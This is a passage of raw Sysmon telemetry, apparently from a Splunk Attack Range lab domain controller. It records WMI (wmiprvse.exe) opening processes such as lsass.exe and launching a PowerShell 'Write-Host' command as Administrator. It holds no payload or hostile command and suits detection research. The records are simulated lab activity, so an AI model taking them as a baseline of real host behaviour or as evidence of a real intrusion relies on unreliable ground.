16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5jduppiu.hp0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.389{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BCAA-00000000AD01}9400C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002240389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.389{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.389{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D57E720152011779CD3945AA1CF38699,SHA256=8A0463809C332E5BAD8560AB85C077CF9611DA5FC9EB72F6245518FB66487EA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.389{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.389{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.389{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.375{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.375{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.375{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.375{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.375{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002240378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.385{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Comma Write-Host 25435ae5-a1fd-44dd-b948-670f39e3f31dC:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002240377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.375{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5jduppiu.hp0.ps12021-03-02 16:54:03.375 10341000x80000000000000002240376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.357{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BAAA-00000000AD01}7868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B8AA-00000000AD01}12596C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\S